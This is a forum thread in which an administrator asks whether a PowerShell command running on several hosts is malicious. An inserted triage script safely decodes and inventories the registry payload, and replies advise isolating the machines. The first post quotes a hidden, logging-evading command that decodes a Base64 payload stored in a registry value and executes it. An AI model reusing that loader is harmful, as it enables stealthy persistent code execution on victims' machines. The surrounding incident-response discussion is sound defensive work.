Powershell script running in our environment - Is it malicious???


This topic contains 3 replies, has 4 voices, and was last updated by a Participant 1 month, 3 weeks ago.

  • #167803

    Participant
    Topics: 1
    Replies: 0
    Points: 16
    Rank: Member

    Any Powershell experts I can use your help.

    I have this script below that is running on multiple hosts, and wondering if you can tell me what it means or does?

    thanks:

    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -version 2 -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp "HKLM:\SOFTWARE\Microsoft\Powershell").ScriptInit)));

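    A defender-side way to answer the question above, added here as an example and not code posted in the thread: it reads the same ScriptInit value the command line decodes, but writes the decoded text to a file for the security team instead of running it, records a hash so the payload can be correlated across hosts, and lists scheduled tasks and WMI consumers that reference it. It assumes an elevated PowerShell 5.1 session; the output directory $OutDir is an assumption.

```powershell
# Added triage example, not code from the original thread. Reads the same registry
# value the suspicious command line decodes, but never runs it: the decoded text goes
# to a file for the security team together with its SHA-256 hash, and the script
# lists scheduled tasks and WMI consumers that reference ScriptInit or the registry key.
# Run from an elevated PowerShell 5.1 prompt on an affected host. $OutDir is an assumption.

$RegPath   = 'HKLM:\SOFTWARE\Microsoft\Powershell'
$ValueName = 'ScriptInit'
$OutDir    = Join-Path $env:SystemDrive 'IR-Triage'

$item = Get-ItemProperty -Path $RegPath -Name $ValueName -ErrorAction SilentlyContinue
if ($null -eq $item) {
    Write-Output "No '$ValueName' value under $RegPath on $env:COMPUTERNAME."
    return
}
$encoded = [string]$item.$ValueName
New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

# Decode exactly as the command line does (Base64 -> ASCII), into a variable, not into iex.
try {
    $decoded = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($encoded))
} catch {
    Write-Warning "Value is not valid Base64; saving the raw value instead."
    $decoded = $encoded
}

$encPath = Join-Path $OutDir 'ScriptInit.b64.txt'
$decPath = Join-Path $OutDir 'ScriptInit.decoded.txt'
Set-Content -Path $encPath -Value $encoded -Encoding ASCII
Set-Content -Path $decPath -Value $decoded -Encoding UTF8
$hash = (Get-FileHash -Path $decPath -Algorithm SHA256).Hash
Write-Output "Decoded payload saved to $decPath (SHA-256 $hash); do not execute it."

# What launches it? Scheduled tasks and permanent WMI event consumers are common carriers
# for a command line like this one; report any that mention the key or value name.
Get-ScheduledTask -ErrorAction SilentlyContinue |
    Where-Object { ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -match 'ScriptInit|SOFTWARE\\Microsoft\\Powershell' } |
    Select-Object TaskPath, TaskName, State

Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer -ErrorAction SilentlyContinue |
    Where-Object { $_.CommandLineTemplate -match 'ScriptInit' } |
    Select-Object Name, CommandLineTemplate

# "-version 2" asks for the PowerShell 2.0 engine, which has no script block logging.
# Report whether that engine is still installed so the audit gap can be closed.
Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue |
    Select-Object FeatureName, State
```

Collect the two output files and the hash from each affected host before isolating it, so the security team can compare payloads without anyone re-running the command.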

  • #167875

    Participant
    Topics: 0
    Replies: 15
    Points: 61
    Helping Hand
    Rank: Member

    What is the value in ScriptInit registry key?
    Looks like, it is invoking a command which is encoded in ScriptInit key.

    Also did a Google search and it is pointing to malicious.

  • #168151

    Participant
    Topics: 2
    Replies: 999
    Points: 1,946
    Helping Hand
    Rank: Community Hero

    If you did not write and deploy it, and/or no one you are aware of did so, or it was not part of some package you purchased, then the default security process is to fail closed / disconnect it from the network / isolate the device / do not tamper with it or you ruin forensics / not trusted / kill it, period. Send it to your risk management / security team for review, as a simple text file, or bring them to the system that has it.

    If you don't know what a script is doing, then don't allow it to run.

    All audit modes should be leveraged.

  • #168181

    Participant
    Topics: 0
    Replies: 44
    Points: 235
    Helping Hand
    Rank: Participant

    @akimbjj7725

    Is your system managed by any MSP software like Kaseya or ConnectWise?
